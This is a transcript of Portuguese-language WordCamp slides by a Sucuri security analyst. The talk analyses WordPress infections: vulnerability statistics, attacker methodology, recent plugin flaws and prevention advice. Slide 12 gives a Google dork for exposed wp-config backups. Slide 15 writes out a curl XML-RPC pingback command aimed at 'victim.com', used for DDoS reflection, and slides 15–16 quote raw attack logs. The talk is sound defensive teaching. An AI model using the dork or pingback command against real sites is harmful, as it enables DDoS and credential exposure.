Analise de Infeccoes no WordPress - WordCampBH14

Transcript

1. Análise de Infecções no WordPress Bruno Borges Security Analyst @

   Sucuri.net @brunoborgessec #wordcampbh
2. None

3. Vetores de Ataque @brunoborgessec :: #wordcampbh

4. Histórico de Releases do WP @brunoborgessec :: #wordcampbh

5. Histórico de Releases do WP @brunoborgessec :: #wordcampbh 56% 44%

   Security Release Maintenance Todas as versões à partir de 3.0 (2010)

6. Histórico de Releases do WP @brunoborgessec :: #wordcampbh 43% 57%

   Security Release Maintenance Todas as versões à partir de 2013 (WP 3.5.1)

7. Vulnerabilidades do WP @brunoborgessec :: #wordcampbh Vulnerabilidades reportadas (CVE) –

   core, plugins, themes http://www.cvedetails.com/vendor/2337/Wordpress.html

8. Vulnerabilidades do WP @brunoborgessec :: #wordcampbh Tipos de Vulnerabilidades http://www.cvedetails.com/vendor/2337/Wordpress.html

9. Vulnerabilidades do WP @brunoborgessec :: #wordcampbh Tempo de descoberta até

   correção da vulnerabilidade https://www2.trustwave.com/2013GSR.html

10. Metodologia dos Ataques @brunoborgessec :: #wordcampbh

11. Metodologia dos Ataques @brunoborgessec :: #wordcampbh 1) Encontrar vulnerabilidade: exploit-db.com

    cve.mitre.org web.nvd.nist.gov seclists.org/fulldisclosure

12. Metodologia dos Ataques @brunoborgessec :: #wordcampbh 2) Encontrar alvo shodanhq.com

    Google Dork: inurl:wp-config.php.bkp

13. Metodologia dos Ataques @brunoborgessec :: #wordcampbh 3) Ataque!

14. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh

15. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh +162.000 sites WordPress

    sendo usados para DDoS 74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com" 121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" .. $ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</ methodName><params><param><value><string>http://victim.com</string></value></ param><param><value><string>www.anywordpresssite.com/postchosen</string></ value></param></params></methodCall>'

16. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh +162.000 sites WordPress

    sendo usados para DDoS 93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall> \x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A <value>\x0A <string>http://fastbet99.com/?1698491=8940641</string>\x0A </value>\x0A </param>\x0A <param>\x0A <value>\x0A <string>yoursite.com</string>\x0A </value>\x0A </param>\x0A</params>\x0A</methodCall> \x0A" 94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/? 7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A" Verifique se seu site está fazendo isso: http://labs.sucuri.net/?is-my-wordpress-ddosing http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html

17. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh JetPack Plugin http://blog.sucuri.net/2014/04/critical-update-for-jetpack-wordpress-plugin.html

    Versões afetadas: Todas desde outubro, 2012 (Jetpack 1.9) Versão Recomendada: 2.9.3 CVE-2014-0173 A vulnerabilidade permite burlar o controle de acesso e publicar posts no site

18. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh http://blog.sucuri.net/2013/12/wordpress-optimizepress-theme-file-upload-vulnerability.html Versão afetada:

    1.0 OptimizePress Theme – File Upload Vulnerability Ataque no arquivo: lib/admin/media-upload.php Permite o upload de quaisquer arquivos em: wp-content/uploads/optpress/images_comingsoon

19. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh Problemas em Plugins

    e Temas GRÁTIS

20. Ameaças & Vulnerabilidades Recentes @brunoborgessec :: #wordcampbh Problemas em Plugins

    e Temas GRÁTIS

21. Como prevenir uma infecção @brunoborgessec :: #wordcampbh

22. Como prevenir uma infecção @brunoborgessec :: #wordcampbh •  Tenha backup

    de arquivos & database •  Tenha backup de temas e plugins pagos •  WP Core, plugins e temas sempre atualizados •  Pesquise se existem vulnerabilidades conhecidas paras os temas e plugins que estiver usando •  Delete temas/plugins que não estejam em uso

23. Como prevenir uma infecção @brunoborgessec :: #wordcampbh •  Saiba suas

    credenciais de FTP & Cpanel/Hosting •  Permissões corretas nos diretórios •  Não busque FREE plugins / themes no google! •  Não deixe arquivos de backup no servidor: .htaccess.bkp wp-config.php.bkp database-maio14.sql.bkp

24. Como prevenir uma infecção @brunoborgessec :: #wordcampbh •  Aplicar funções

    (roles) adequadas

25. Como prevenir uma infecção @brunoborgessec :: #wordcampbh •  Verifique se

    seu site está limpo sitecheck.sucuri.net

26. Como prevenir uma infecção @brunoborgessec :: #wordcampbh •  Use um

    WAF / Website Firewall

27. Como prevenir uma infecção @brunoborgessec :: #wordcampbh •  Use um

    WAF / Website Firewall •  A forma mais rápida de proteger o seu site. •  Requer pouco esforço. •  Necessário pouco conhecimento de Segurança

28. Dúvidas? @brunoborgessec :: #wordcampbh

29. OBRIGADO! @brunoborgessec :: #wordcampbh @brunoborgessec /in/brunoaborges [email protected] bbsec.net / sucuri.net